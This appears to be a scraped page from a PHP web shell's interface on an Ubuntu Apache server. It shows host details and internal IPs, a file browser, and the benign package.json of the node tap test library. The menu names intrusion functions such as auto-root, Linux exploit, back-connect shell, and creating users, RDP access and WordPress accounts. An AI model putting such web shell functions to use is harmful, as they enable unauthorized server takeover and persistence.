Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
tap /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
package.json
2.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "tap", "version": "12.0.1", "author": "Isaac Z. Schlueter <i@izs.me> (http://blog.izs.me)", "description": "A Test-Anything-Protocol library", "homepage": "http://node-tap.org/", "bin": { "tap": "bin/run.js" }, "main": "lib/tap.js", "engines": { "node": ">=4" }, "dependencies": { "bind-obj-methods": "^2.0.0", "clean-yaml-object": "^0.1.0", "supports-color" : "^3", "foreground-child": "^1.3.3", "fs-exists-cached": "^1.0.0", "function-loop": "^1.0.1", "glob": "^7.0.0", "isexe": "^2.0.0", "js-yaml": "^3.11.0", "mkdirp": "^0.5.1", "own-or": "^1.0.0", "own-or-env": "^1.0.1", "rimraf": "^2.6.2", "signal-exit": "^3.0.0", "source-map-support": "^0.5.6", "stack-utils": "^1.0.0", "tap-mocha-reporter": "^3.0.7", "tap-parser": "^7.0.0", "tmatch": "^4.0.0", "trivial-deferred": "^1.0.1", "tsame": "^2.0.0", "write-file-atomic": "^2.3.0", "yapool": "^1.0.0" }, "optionalDependencies" : { "nyc": "^11.8.0", "coveralls": "^3.0.1", "opener": "^1.4.1" }, "keywords": [ "assert", "tap", "test", "testing" ], "license": "ISC", "repository": "https://github.com/tapjs/node-tap.git", "scripts": { "regen-fixtures": "node scripts/generate-test-test.js test-legacy/test/*.js", "snap": "TAP_SNAPSHOT=1 node bin/run.js test/*.js", "test": "node bin/run.js test/*.js --100 -J --nyc-arg=--include={lib,bin} -c", "test-all": "node bin/run.js test/*.js test-legacy/*.js --100 -J --nyc-arg=--include={lib,bin}", "unit": "bash scripts/unit.sh", "test-legacy": "node bin/run.js test-legacy/*.* --coverage -t3600 --nyc-arg=--include={lib,bin}", "smoke": "node bin/run.js --node-arg=test-legacy/test.js test-legacy/test/*.js -j2", "posttest": "standard lib test", "t": "node bin/run.js test/*.* -sfails.txt", "preversion": "npm test", "postversion": "npm publish", "postpublish": "git push origin --all; git push origin --tags" }, "devDependencies": { "standard": "^11.0.1", "which": "^1.1.1" }, "files": [ "bin/*.js", "bin/*.txt", "lib/*.js" ] }
Close